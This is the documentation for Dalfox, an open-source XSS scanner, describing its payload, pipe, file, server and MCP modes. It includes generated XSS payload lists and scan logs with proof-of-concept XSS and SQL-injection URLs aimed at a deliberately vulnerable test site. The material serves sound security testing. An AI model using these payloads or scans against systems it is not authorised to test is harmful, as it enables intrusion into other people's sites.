For more information on output formats and report interpretation, see the [JSON Format Documentation](../advanced/resources/json/) and [PoC Format Documentation](../advanced/resources/format-of-poc/).

---


## Overview

# Overview

Dalfox is a powerful open-source tool designed for automated detection of XSS (Cross-Site Scripting) vulnerabilities. With its advanced testing engine and comprehensive feature set, Dalfox simplifies the process of scanning, analyzing parameters, and verifying vulnerabilities. Whether you are performing quick scans or detailed analyses, Dalfox provides a streamlined experience tailored to the needs of security professionals and researchers.

![Dalfox Screenshot](/images/screen.jpeg)

The name "Dalfox" has a unique origin:
- **Dal ([달](https://en.wiktionary.org/wiki/달))**: The Korean word for "moon."
- **Fox**: An acronym for "Finder Of XSS" 🦊.

Key highlights of Dalfox include:
- **Flexible Scanning Modes**: Supports URL-based scans, file-based inputs, pipelines, and server modes for versatile testing approaches.
- **Comprehensive Analysis**: Detects reflected, stored, and DOM-based XSS vulnerabilities, along with parameter mining and static analysis to ensure thorough coverage.
- **Extensibility**: Offers custom payloads, remote wordlists, and API integrations for highly tailored testing to meet your specific requirements.
- **Performance Optimization**: Features such as payload abstraction, bad character filtering, and parallel encoding substantially improve efficiency and reduce scan times.
- **Detailed Reporting**: Outputs can be formatted as plain text or JSON, with options for in-depth reports to facilitate clear communication of findings.

## Contributors

Dalfox is an open-source project made with ❤️

If you want to contribute to this project, please see [CONTRIBUTING.md](https://github.com/hahwul/dalfox/blob/main/CONTRIBUTING.md) and submit a Pull Request with your contributions.

[![Contributors](https://github.com/hahwul/dalfox/raw/main/CONTRIBUTORS.svg)](https://github.com/hahwul/dalfox/graphs/contributors)

---


## Payload Mode

# Payload Mode

`payload` mode is a mode for easy testing of XSS. Generate and Enumerate XSS Payloads and wordlists

```bash
dalfox payload {flags}
```

e.g
```bash
dalfox payload --enum-injs --entity-event-handler"
```

## Make-Bulk
Make-bulk generates many xss payloads. At this point, the parameters of the alert are configured as sequence and it is easy to find which payload was triggered during the XSS test.

```bash
dalfox payload --make-bulk
```

output

```html
...snip...
<track onbeforepaste=\"alert(488)\" contenteditable>test<\/track>
<tt onbeforepaste=\"alert(489)\" contenteditable>test<\/tt>
<u onbeforepaste=\"alert(490)\" contenteditable>test<\/u>
<ul onbeforepaste=\"alert(491)\" contenteditable>test<\/ul>
<var onbeforepaste=\"alert(492)\" contenteditable>test<\/var>
<video onbeforepaste=\"alert(493)\" contenteditable>test<\/video>
<wbr onbeforepaste=\"alert(494)\" contenteditable>test<\/wbr>
<xmp onbeforepaste=\"alert(495)\" contenteditable>test<\/xmp>
<body onbeforeprint=alert(496)>
<svg><path><animateMotion onbegin=alert(497) dur=\"1s\" repeatCount=\"1\">
<svg><animatetransform onbegin=alert(498) attributeName=transform>
<svg><set onbegin=alert(499) attributename=x dur=1s>
<svg><animate onbegin=alert(500) attributeName=x dur=1s>
<input onblur=alert(501) id=x><input autofocus>
<textarea onblur=alert(502) id=x><\/textarea><input autofocus>
...snip...
```

## Encoder
```bash
--encoder-url            Encoding output [URL]
```

## Supported
```bash
--entity-event-handler   Enumerate a event handlers for xss
--entity-gf              Enumerate a gf-patterns xss params
--entity-special-chars   Enumerate a special chars for xss
--entity-useful-tags     Enumerate a useful tags for xss
--enum-attr              Enumerate a in-attr xss payloads
--enum-common            Enumerate a common xss payloads
--enum-html              Enumerate a in-html xss payloads
--enum-injs              Enumerate a in-js xss payloads
--make-bulk              Make bulk payloads for stored xss
--remote-payloadbox      Enumerate a payloadbox's xss payloads
--remote-portswigger     Enumerate a portswigger xss cheatsheet payloads
```

## Screenshots
![1414](https://user-images.githubusercontent.com/13212227/120361642-0b9e1000-c345-11eb-8283-9c0b7fdac8b3.jpg)

---


## Pipeline Mode

# Pipeline Mode

`pipe` mode is the mode for scanning multiple URLs. I receive input as system I/O, so you can connect with other tools through pipeline.
```shell
dalfox pipe
```

e.g
```shell
echo urls.txt | dalfox pipe
```

---


## Running

# Running

---


## From Raw Request

# Scanning from Raw Request with Dalfox

This guide provides detailed instructions on how to scan a target using a raw HTTP request with Dalfox. Follow the steps below to perform a scan using a raw request.

## Using `file` mode

### Sample Raw Request

Create a file named `sample_rawdata.txt` with the following content:

```http
POST https://www.hahwul.com/?q=dalfox HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Connection: keep-alive
Cookie: _ga=GA1.2.1102548207.1555467144; _gid=GA1.2.1362788908.1563875038
Upgrade-Insecure-Requests: 1
Host: www.hahwul.com

asdf=asdf
```

### Command

To scan using the raw request from a file, use the following command:

```bash
dalfox file ./samples/sample_rawdata.txt --rawdata
```

## Using `pipe` mode

You can also provide the raw request via stdin using the `pipe` command.

### Command

```bash
cat ./samples/sample_rawdata.txt | dalfox pipe --rawdata
```

Or for base64 encoded requests:

```bash
cat ./samples/sample_rawdata.txt | base64 | dalfox pipe --rawdata
```

Dalfox will automatically detect if the piped input is base64 encoded and decode it before parsing.

## Output

Here is an example of the output you can expect from running the above command:

```
[*] Using file mode(rawdata)
[*] Target URL: https://www.hahwul.com/?q=xspear
[*] Vaild target [ code:405 / size:131 ]
[*] Using dictionary mining option [list=GF-Patterns] 📚⛏
[*] Using DOM mining option 📦⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  🔍
[*] Start parameter analysis.. 🔍
[*] Start static analysis.. 🔍
[I] Found 0 testing point in DOM Mining
[*] Static analysis done ✓
[*] BAV analysis done ✓
[*] Parameter analysis  done ✓
[*] Generate XSS payload and optimization.. 🛠
[*] Start XSS Scanning.. with 33 queries 🗡
[*] Finish :D
```

## Explanation of Output

- **Target URL**: The URL being scanned.
- **Valid target**: Indicates that the target URL is valid and accessible.
- **Dictionary mining option**: Uses predefined patterns to find vulnerabilities.
- **DOM mining option**: Analyzes the Document Object Model (DOM) for vulnerabilities.
- **BAV analysis**: Basic Another Vulnerability analysis, including SQL injection, SSTI, and Open Redirect.
- **Static analysis**: Analyzes the static content of the target.
- **Parameter analysis**: Analyzes the parameters of the target URL.
- **Generate XSS payload and optimization**: Generates and optimizes XSS payloads for scanning.

---


## Multiple URL

# Scanning Multiple URLs with Dalfox

This guide provides detailed instructions on how to scan multiple URLs using Dalfox. You can use various methods such as pipe mode and file mode to handle multiple targets.

## Using Pipe Mode
Pipe mode allows you to pass multiple URLs to Dalfox via a pipeline.

### Command
```bash
cat samples/sample_target.txt | dalfox pipe
```

### Output
```bash
[*] Using pipeline mode
[*] Loaded 2 target urls
[*] Target URL: https://www.hahwul.com/?q=123
[*] Vaild target [ code:200 / size:68629 ]
[*] Using dictionary mining option [list=GF-Patterns] 📚⛏
[*] Using DOM mining option 📦⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  🔍
[*] Start static analysis.. 🔍
[*] Start parameter analysis.. 🔍
[*] Static analysis done ✓
[I] Found 1 testing point in DOM Mining
[*] BAV analysis done ✓
[*] Parameter analysis done ✓
[I] Content-Type is text/html; charset=utf-8
[I] Access-Control-Allow-Origin is *
[*] Generate XSS payload and optimization.. 🛠
[*] Start XSS Scanning.. with 33 queries 🗡
[*] Finish :D
[*] Target URL: http://testphp.vulnweb.com/listproducts.php?cat=asdf&ff=1
[*] Vaild target [ code:200 / size:4868 ]
[*] Using dictionary mining option [list=GF-Patterns] 📚⛏
[*] Using DOM mining option 📦⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  🔍
[*] Start parameter analysis.. 🔍
[*] Start static analysis.. 🔍
[G] Found dalfox-error-mysql via built-in grepping / payload: toGrepping
    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php?cat=asdf&ff=%3B
[G] Found dalfox-error-mysql2 via built-in grepping / payload: toGrepping
    Warning: mysql
[POC][G][BUILT-IN/dalfox-error-mysql2/GET] http://testphp.vulnweb.com/listproducts.php?cat=asdf&ff=%3B
[G] Found dalfox-error-mysql5 via built-in grepping / payload: toGrepping
    check the manual that corresponds to your MySQL server version
[POC][G][BUILT-IN/dalfox-error-mysql5/GET] http://testphp.vulnweb.com/listproducts.php?cat=+AND+0&ff=1
[G] Found dalfox-error-mysql1 via built-in grepping / payload: toGrepping
    SQL syntax; check the manual that corresponds to your MySQL
[POC][G][BUILT-IN/dalfox-error-mysql1/GET] http://testphp.vulnweb.com/listproducts.php?cat=+AND+0&ff=1
[I] Found 2 testing points in DOM Mining
[*] Static analysis done ✓
[*] BAV analysis done ✓
[*] Parameter analysis done ✓
[I] Content-Type is text/html; charset=UTF-8
[I] Reflected cat param => Injected: /inHTML-none(1)  ▶
    48 line:  	Error: Unknown column 'asdfDalfox' in 'where cl
[*] Generate XSS payload and optimization.. 🛠
[*] Start XSS Scanning.. with 201 queries 🗡
[V] Triggered XSS Payload (found DOM Object): cat='><sVg/onload=alert(45) class=dalfox>
    48 line:  syntax to use near ''><sVg/onload=alert(45) class=dalfox>' at line 1
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?cat=asdf%27%3E%3CsVg%2Fonload%3Dalert%2845%29+class%3Ddalfox%3E&ff=1
```

## Using File Mode
File mode allows you to pass a file containing multiple URLs to Dalfox.

### Command
```bash
dalfox file ./samples/sample_target.txt
```

### Output
```bash
[*] Using file mode(targets list)
[*] Loaded 2 target urls
[*] Target URL: https://www.hahwul.com/?q=123
[*] Vaild target [ code:200 / size:68629 ]
[*] Using dictionary mining option [list=GF-Patterns] 📚⛏
[*] Using DOM mining option 📦⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  🔍
[*] Start parameter analysis.. 🔍
[*] Start static analysis.. 🔍
[I] Found 1 testing point in DOM Mining
[*] Static analysis done ✓
[*] BAV analysis done ✓
[*] Parameter analysis done ✓
[I] Content-Type is text/html; charset=utf-8
[I] Access-Control-Allow-Origin is *
[*] Generate XSS payload and optimization.. 🛠
[*] Start XSS Scanning.. with 33 queries 🗡
[*] Finish :D
[*] Target URL: http://testphp.vulnweb.com/listproducts.php?cat=asdf&ff=1
[*] Vaild target [ code:200 / size:4868 ]
[*] Using dictionary mining option [list=GF-Patterns] 📚⛏
[*] Using DOM mining option 📦⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  🔍
[*] Start parameter analysis.. 🔍
[*] Start static analysis.. 🔍
[G] Found dalfox-error-mysql via built-in grepping / payload: toGrepping
    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php?cat=asdf&ff=%27+or+
[G] Found dalfox-error-mysql2 via built-in grepping / payload: toGrepping
    Warning: mysql
[POC][G][BUILT-IN/dalfox-error-mysql2/GET] http://testphp.vulnweb.com/listproducts.php?cat=asdf&ff=%27+or+
[*] Static analysis done ✓
[G] Found dalfox-error-mysql5 via built-in grepping / payload: toGrepping
    check the manual that corresponds to your MySQL server version
[POC][G][BUILT-IN/dalfox-error-mysql5/GET] http://testphp.vulnweb.com/listproducts.php?cat=+HAVING+1%3D1--&ff=1
[G] Found dalfox-error-mysql1 via built-in grepping / payload: toGrepping
    SQL syntax; check the manual that corresponds to your MySQL
[POC][G][BUILT-IN/dalfox-error-mysql1/GET] http://testphp.vulnweb.com/listproducts.php?cat=+HAVING+1%3D1--&ff=1
[I] Found 2 testing points in DOM Mining
[*] BAV analysis done ✓
[*] Parameter analysis done ✓
[I] Content-Type is text/html; charset=UTF-8
[I] Reflected cat param => Injected: /inHTML-none(1)  ▶
    48 line:  	Error: Unknown column 'asdfDalfox' in 'where cl
[*] Generate XSS payload and optimization.. 🛠
[*] Start XSS Scanning.. with 201 queries 🗡
[V] Triggered XSS Payload (found DOM Object): cat=</ScriPt><sCripT class=dalfox>alert(45)</sCriPt>
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?cat=asdf%3C%2FScriPt%3E%3CsCripT+class%3Ddalfox%3Ealert%2845%29%3C%2FsCriPt%3E&ff=1
[*] Finish :D
```

---


## Single URL

# Scanning a Single URL with Dalfox

This guide provides detailed instructions on how to scan a single URL using Dalfox. Follow the steps below to perform a scan on a single target URL.

## Command

To scan a single URL, use the following command:

```bash
dalfox url http://testphp.vulnweb.com/listproducts.php
```

## Output

Here is an example of the output you can expect from running the above command:

```
Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
[*] Using single target mode
[*] Target URL: http://testphp.vulnweb.com/listproducts.php
[*] Vaild target [ code:200 / size:4819 ]
[*] Using dictionary mining option [list=GF-Patterns] 📚⛏
[*] Using DOM mining option 📦⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  🔍
[*] Start static analysis.. 🔍
[*] BAV analysis done ✓
[*] Start parameter analysis.. 🔍
[I] Found 2 testing point in DOM Mining
[G] Found dalfox-error-mysql2 via built-in grepping / original request
    Warning: mysql
[POC][G][BUILT-IN/dalfox-error-mysql2/GET] http://testphp.vulnweb.com/listproducts.php
[G] Found dalfox-error-mysql via built-in grepping / original request
    Warning: mysql_fetch_array() expects parameter 1 to be resource, null given in /hj/var/www/listproducts.php on line 74
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php
[*] Static analysis done ✓
[G] Found dalfox-error-mysql1 via built-in grepping / payload: dalfox>
    SQL syntax; check the manual that corresponds to your MySQL
[POC][G][BUILT-IN/dalfox-error-mysql1/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox%3E
[G] Found dalfox-error-mysql5 via built-in grepping / payload: dalfox>
    check the manual that corresponds to your MySQL server version
[POC][G][BUILT-IN/dalfox-error-mysql5/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox%3E
[*] Parameter analysis  done ✓
[I] Content-Type is text/html; charset=UTF-8
[I] Reflected cat param => Injected: /inHTML-none(1)  ▶
    48 line:  	Error: Unknown column 'Dalfox' in 'where cl
[*] Generate XSS payload and optimization.Optimization.. 🛠
[*] Start XSS Scanning.. with 201 queries 🗡
[V] Triggered XSS Payload (found DOM Object): cat=<dalfox class=dalfox>
    48 line:  yntax to use near '=<dalfox class=dalfox>' at line 1
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?cat=%3Cdalfox+class%3Ddalfox%3E
[*] Finish :D
```

## Explanation of Output

- **Target URL**: The URL being scanned.
- **Valid target**: Indicates that the target URL is valid and accessible.
- **Dictionary mining option**: Uses predefined patterns to find vulnerabilities.
- **DOM mining option**: Analyzes the Document Object Model (DOM) for vulnerabilities.
- **BAV analysis**: Basic Another Vulnerability analysis, including SQL injection, SSTI, and Open Redirect.
- **Static analysis**: Analyzes the static content of the target.
- **Parameter analysis**: Analyzes the parameters of the target URL.
- **Generate XSS payload and optimization**: Generates and optimizes XSS payloads for scanning.
- **Triggered XSS Payload**: Indicates that an XSS payload was successfully triggered.

---


## Server Mode

# Server Mode

## Overview

Server mode transforms Dalfox into a service that can be used in different ways. By default, Dalfox runs as a REST API service, but it can also operate as an MCP (Model Context Protocol) server using the `--type` flag.

### Server Types

1. **REST API Mode (Default)**: Enables integration with other security tools, automation workflows, and continuous security pipelines through HTTP endpoints.

2. **MCP Mode**: Allows Dalfox to operate as a Model Context Protocol server, making it compatible with advanced AI assistants and development environments like Visual Studio Code.

These modes are particularly valuable for:
- Security operations centers (SOCs) looking to build centralized scanning infrastructure
- DevSecOps teams integrating security scanning into CI/CD pipelines
- Bug bounty hunters automating large-scale testing
- Creating custom security dashboards with XSS scanning capabilities
- AI-assisted security testing workflows (MCP mode)

## Starting the Server

To start Dalfox in server mode, use the `server` command:

```bash
# Start with default settings (listening on 0.0.0.0:6664 in REST API mode)
dalfox server

# Specify custom host and port
dalfox server --host 127.0.0.1 --port 8090

# Start REST API server with API key authentication
dalfox server --api-key "your-secret-key"

# Start REST API server with CORS and JSONP enabled
dalfox server --allowed-origins "http://localhost:3000,https://example.com" --jsonp

# Start as an MCP server
dalfox server --type mcp
```

### Server Mode Flags

| Flag                | Description                                                                  | Default        |
|---------------------|------------------------------------------------------------------------------|----------------|
| `--host`            | Specify the address to bind the server to                                    | `0.0.0.0`      |
| `--port`            | Specify the port to bind the server to                                       | `6664`         |
| `--type`            | Specify the server type (`rest` or `mcp`)                                    | `rest`         |
| `--api-key`         | Specify the API key for server authentication (REST API mode only)           | `""` (empty)   |
| `--allowed-origins` | Comma-separated list of allowed origins for CORS (REST API mode only)        | `[]` (empty)   |
| `--jsonp`           | Enable JSONP responses by checking for a `callback` param (REST API mode only) | `false`        |

### Example Output

```bash
dalfox server --host 0.0.0.0 --port 8090
    _..._
  .' .::::.   __   _   _    ___ _ __ __
 :  :::::::: |  \ / \ | |  | __/ \\ V /
 :  :::::::: | o ) o || |_ | _( o )) (
 '. '::::::' |__/|_n_||___||_| \_//_n_\
   '-.::''
Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
 🎯  Target                 REST API Mode
 🧲  Listen Address         0.0.0.0:8090
 🏁  Method                 GET
 🖥  Worker                 100
 🔦  BAV                    true
 ⛏  Mining                 true (Gf-Patterns)
 🔬  Mining-DOM             true (mining from DOM)
 ⏱  Timeout                10
 📤  FollowRedirect         false
 🕰  Started at             2021-07-08 18:10:15.214339875 +0900 KST m=+0.027712246
```

## API Documentation

The Dalfox server provides a Swagger UI for easy API exploration and testing. Access it at:

```
http://your-server-address:port/swagger/index.html
```

For example: `http://localhost:8090/swagger/index.html`

![Swagger UI Screenshot](https://user-images.githubusercontent.com/13212227/89736705-5002ab80-daa6-11ea-9ee8-d2def396c25a.png)

## API Endpoints

Dalfox's server mode provides several RESTful endpoints for scan management:

| Endpoint | Method | Description |
|----------|--------|-------------|
| `/scan`  | POST   | Submit a new scan request |
| `/result/:id` | GET | Retrieve scan results by scan ID |
| `/status/:id` | GET | Check the status of a scan by ID |
| `/stop/:id`   | GET | Stop a running scan by ID |

## Basic Scanning Example

### Initiating a Basic Scan

To start a scan with default settings:

```bash
# Request
curl -X POST "http://localhost:8090/scan" \
  -H "Content-Type: application/json" \
  -H "X-API-KEY: your-secret-key" \
  -d '{"url": "https://example.com"}'

# Response
{"code":200,"msg":"28846e5b355577ecd60766f45735c4c687e8c1c200db65700e3f458b73234984","data":null}
```
**Note:** If API key authentication is enabled via the `--api-key` flag when starting the server, you must include the `X-API-KEY` header in all your API requests.

The response contains a scan ID (`msg` field) that you'll use to retrieve results.

### Retrieving Scan Results

```bash
curl -X GET "http://localhost:8090/result/28846e5b355577ecd60766f45735c4c687e8c1c200db65700e3f458b73234984" \
  -H "X-API-KEY: your-secret-key"
```

## Advanced Scanning with Options

You can customize scans by providing options in the request body:

```bash
# Request with custom options
curl -X POST "http://localhost:8090/scan" \
  -H "Content-Type: application/json" \
  -H "X-API-KEY: your-secret-key" \
  -d '{
    "url": "https://example.com", 
    "options": {
      "cookie": "session=abc123",
      "worker": 20,
      "delay": 100,
      "blind": "your-blind-xss.com",
      "header": ["Authorization: Bearer token", "Custom-Header: value"]
    }
  }'
```

### Available Options

The server mode accepts the same options available in CLI mode. Below are some commonly used options:

```json
{
  "url": "https://example.com",
  "options": {
    // Target specification
    "param": ["search", "q"],       // Target specific parameters
    "header": ["Authorization: Bearer token"],  // Custom headers
    "cookie": "sessionid=123456",   // Cookies
    "data": "username=test",        // POST data
    "method": "POST",               // HTTP method

    // Scanning behavior
    "worker": 30,                   // Number of concurrent workers
    "timeout": 10,                  // Timeout in seconds
    "delay": 100,                   // Delay between requests (ms)
    "blind": "your-callback.xss.ht", // Blind XSS callback URL
    "follow-redirects": true,       // Follow HTTP redirects

    // Feature control
    "mining-dom": true,             // Enable DOM-based parameter mining
    "mining-dict": true,            // Enable dictionary-based parameter mining
    "only-discovery": false,        // Only perform parameter analysis
    "skip-bav": false,              // Skip BAV analysis

    // Output control
    "format": "json",               // Output format
    "silence": true,                // Minimal output mode
    "found-action": "webhook.sh",   // Action on finding vulnerability
    "debug": false                  // Enable debug mode
  }
}
```

For a complete list of options, refer to the [options model](https://github.com/hahwul/dalfox/blob/master/pkg/model/options.go).

## Integration Examples

### Python Client Example

```python
import requests
import json
import time

DALFOX_SERVER = "http://localhost:8090"

def start_scan(url, options=None):
    payload = {"url": url}
    if options:
        payload["options"] = options
    
    response = requests.post(f"{DALFOX_SERVER}/scan", json=payload)
    return response.json()["msg"]  # Return the scan ID

def get_scan_results(scan_id):
    response = requests.get(f"{DALFOX_SERVER}/result/{scan_id}")
    return response.json()

def main():
    # Start scan with custom options
    scan_id = start_scan("https://example.com/search?q=test", {
        "worker": 10,
        "timeout": 5,
        "blind": "your-callback.xss.ht"
    })
    
    print(f"Scan started with ID: {scan_id}")
    
    # Poll for results
    while True:
        result = get_scan_results(scan_id)
        if result["status"] == "done":
            print("Scan completed!")
            print(json.dumps(result["data"], indent=2))
            break
        
        print("Scan in progress...")
        time.sleep(5)

if __name__ == "__main__":
    main()
```

### CI/CD Integration (GitHub Actions)

```yaml
name: Dalfox Security Scan

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  security-scan:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      
      - name: Run Dalfox Server
        run: |
          docker run -d -p 6664:6664 hahwul/dalfox:latest server
          sleep 5  # Wait for server to start
      
      - name: Run Scan
        run: |
          # Extract URLs from your application
          URLS=$(grep -r "https://" ./src --include="*.js" | grep -o 'https://[^"]*' | sort | uniq)
          
          # Scan each URL
          for url in $URLS; do
            SCAN_ID=$(curl -s -X POST "http://localhost:6664/scan" \
              -H "Content-Type: application/json" \
              -d "{\"url\": \"$url\"}" | jq -r .msg)
            
            echo "Started scan for $url with ID: $SCAN_ID"
          done
```

## Security Considerations

When deploying Dalfox in server mode, consider the following security practices:

1. **Access Control**: Restrict access to the API server using a reverse proxy, firewall rules, or API keys
2. **Resource Limits**: Set appropriate worker and timeout values to avoid resource exhaustion
3. **Monitoring**: Implement monitoring for the Dalfox server to track resource usage and scan activity
4. **Isolation**: Run the server in an isolated environment (Docker container or separate VM)

## Common Issues and Solutions

| Issue | Solution |
|-------|----------|
| Server unresponsive | Check resource usage; reduce worker count or increase server capacity |
| Slow scan results | Increase worker count or adjust timeout settings |
| Connection errors | Verify network connectivity and firewall settings |
| Memory issues | Reduce concurrent scans or increase server memory |

## Best Practices

- Start with a low number of workers and increase gradually based on your server's capacity
- For production deployments, set up logging and monitoring
- Use a proper API key mechanism for authenticating clients
- Consider implementing rate limiting for public-facing instances
- Regularly update your Dalfox installation to get the latest security checks and bug fixes

## MCP Server Mode
{: .d-inline-block }

New (v2.11.0) 
{: .label .label-blue }

Dalfox can function as a Model Context Protocol (MCP) server, enabling direct integration with AI-powered development environments like Visual Studio Code and compatible AI assistants.

### What is MCP?

Model Context Protocol (MCP) is a protocol designed to enable AI assistants to execute specialized tools in a controlled environment. By running Dalfox as an MCP server, AI coding assistants can directly leverage Dalfox's XSS scanning capabilities within your development workflow.

### Setting Up MCP Integration with VS Code

To use Dalfox as an MCP server with Visual Studio Code:

1. Start Dalfox in MCP server mode:
   ```bash
   dalfox server --type mcp
   ```

2. Configure VS Code to use Dalfox as an MCP server by adding the following to your `settings.json`:
   ```json
   {
     "mcp": {
       "servers": {
         "dalfox": {
           "type": "stdio",
           "command": "dalfox",
           "args": [
             "server",
             "--type=mcp"
           ]
         }
       }
     }
   }
   ```

3. With this configuration, compatible AI coding assistants can now use Dalfox to perform XSS vulnerability scanning directly within your IDE.

### Benefits of MCP Mode

- **AI-Driven Security Testing**: AI assistants can suggest and execute security tests directly within your development environment
- **Interactive Scanning**: Have conversations with AI about possible XSS vulnerabilities in your code
- **Seamless Workflow Integration**: Eliminates the need to switch between your development environment and security tools
- **Guided Remediation**: AI can not only find vulnerabilities but help explain and fix them in context

---


## Stored XSS Mode

# Stored XSS Mode

`sxss` mode is a mode for easy identification of Stored XSS. The default behavior is the same as url mode, but you can specify a separate URL to validate, and you can generate a dynamic verification URL with the --sequence option in case the verification URL changes.

```bash
dalfox sxss {TARGET-URL} --trigger {VERIFY_URL}
```

e.g
```bash
dalfox sxss https://test.url.local/update_profile -d "nickname=abc" --trigger "https://test.url.local/my_profile"
```

send POST request to Store the XSS payload and verify it working of the payload with an GET request
```bash
dalfox sxss -X POST https://test.url.local/update_profile -d "nickname=abc" --trigger "https://test.url.local/my_profile" --reqeust-method GET
```

---


## Update

# Keeping Dalfox Updated

## Why Update Dalfox?

Regularly updating Dalfox provides several important benefits:

- **New Features**: Access to the latest scanning capabilities and improvements
- **Security Fixes**: Protection against vulnerabilities in the tool itself
- **Bug Fixes**: Elimination of known issues from previous versions
- **Performance Improvements**: Better scanning efficiency and reduced resource usage
- **New Payload Patterns**: Enhanced detection of the latest XSS techniques and bypasses

This guide provides detailed instructions on how to update Dalfox using various installation methods.

## Version Information

Before updating, you may want to check your current version and compare it with the latest release:

```bash
# Check your current Dalfox version
dalfox version

# Compare with the latest GitHub release
curl -s https://api.github.com/repos/hahwul/dalfox/releases/latest | grep '"tag_name":' | sed -E 's/.*"v([^"]+)".*/\1/'
```

## Update Methods

### Using Homebrew

If you installed Dalfox using Homebrew on macOS or Linux, updating is straightforward:

```bash
# Update Homebrew's formula list
brew update

# Upgrade Dalfox to the latest version
brew upgrade dalfox
```

After upgrading, verify the new version:

```bash
dalfox version
```

### Using Snapcraft

For Linux systems using Snap packages, update Dalfox with:

```bash
# Update Dalfox snap package
sudo snap refresh dalfox
```

Verify the update:

```bash
dalfox version
```

### Using Go Install

If you installed Dalfox from source using Go, you can update it with the `go install` command:

```bash
# Install the latest version
go install github.com/hahwul/dalfox/v2@latest
```

If you encounter any issues, try clearing the module cache first:

```bash
# Clear the module cache (optional)
go clean -modcache

# Install the latest version
go install github.com/hahwul/dalfox/v2@latest
```

Verify that your PATH includes Go's bin directory:

```bash
# Check if the Go bin directory is in your PATH
echo $PATH | grep -q "$(go env GOPATH)/bin" && echo "Go bin is in PATH" || echo "Go bin is NOT in PATH"

# If missing, add it to your PATH (for bash/zsh)
echo 'export PATH=$PATH:'"$(go env GOPATH)/bin" >> ~/.bashrc
source ~/.bashrc
```

### Using Docker

If you're using Dalfox with Docker, update by pulling the latest image:

```bash
# Update from Docker Hub
docker pull hahwul/dalfox:latest

# OR update from GitHub Container Registry
docker pull ghcr.io/hahwul/dalfox:latest
```

To verify you have the latest version:

```bash
# Check Docker image version
docker run --rm hahwul/dalfox:latest /app/dalfox version
```

#### Running the Updated Docker Image

After pulling the latest image, run Dalfox using the updated container:

```bash
# Run with Docker Hub image
docker run -it hahwul/dalfox:latest /app/dalfox url https://example.com

# OR run with GitHub Container Registry image
docker run -it ghcr.io/hahwul/dalfox:latest /app/dalfox url https://example.com
```

For persistent storage of results, mount a volume:

```bash
docker run -it -v "$(pwd):/output" hahwul/dalfox:latest /app/dalfox url https://example.com -o /output/results.txt
```

## Updating to a Specific Version

If you need to use a specific version of Dalfox rather than the latest:

### Using Go

```bash
# Install a specific version (e.g., v2.8.0)
go install github.com/hahwul/dalfox/v2@v2.8.0
```

### Using Docker

```bash
# Pull a specific version (e.g., v2.8.0)
docker pull hahwul/dalfox:v2.8.0
```

## Post-Update Steps

After updating Dalfox, consider taking these additional steps:

1. **Review new features**: Check the [release notes](https://github.com/hahwul/dalfox/releases) to understand new capabilities
2. **Update configuration files**: Make any necessary adjustments to your configuration files for compatibility with new features
3. **Clear cached data**: Remove any temporary files from previous scans
4. **Run a test scan**: Perform a quick scan to verify the updated version works correctly

```bash
# Test the updated installation
dalfox url https://example.com --format json -o test-result.json
```

## Update Automation

You can create simple scripts to automate Dalfox updates:

### Homebrew Update Script

```bash
#!/bin/bash
# update-dalfox.sh
echo "Updating Dalfox..."
brew update && brew upgrade dalfox
dalfox version
echo "Dalfox update completed."
```

### Docker Update Script

```bash
#!/bin/bash
# update-dalfox-docker.sh
echo "Updating Dalfox Docker image..."
docker pull hahwul/dalfox:latest
echo "Dalfox Docker image updated to:"
docker run --rm hahwul/dalfox:latest /app/dalfox version
```

## Troubleshooting Update Issues

If you encounter issues during the update process:

### Common Problems and Solutions

1. **Permission errors**:
   - Use `sudo` for operations requiring elevated privileges
   - Check file/directory permissions

2. **Path issues**:
   - Ensure the installation directory is in your PATH
   - Verify that older versions aren't shadowing the new one

3. **Dependency conflicts**:
   - Update Go to the latest version if using `go install`
   - Check for conflicting packages if using package managers

### Getting Help

If you continue experiencing problems updating Dalfox:

- Check the [GitHub Issues](https://github.com/hahwul/dalfox/issues) for similar problems
- Join the [Dalfox community discussions](https://github.com/hahwul/dalfox/discussions)
- Report a new issue if your problem hasn't been addressed

## Checking for Updates Automatically

You can add this function to your shell configuration to check for Dalfox updates when opening a terminal:

```bash
# Add to ~/.bashrc or ~/.zshrc
check_dalfox_update() {
  if command -v dalfox &> /dev/null; then
    local current_version=$(dalfox version | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+')
    local latest_version=$(curl -s https://api.github.com/repos/hahwul/dalfox/releases/latest | grep -Eo '"tag_name": "v[0-9]+\.[0-9]+\.[0-9]+"' | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+')
    
    if [[ "$current_version" != "$latest_version" ]]; then
      echo "📢 Dalfox update available: $current_version → $latest_version"
    fi
  fi
}

# Run the check when starting a shell
check_dalfox_update
```

## Community Resources

For additional help and information about Dalfox:

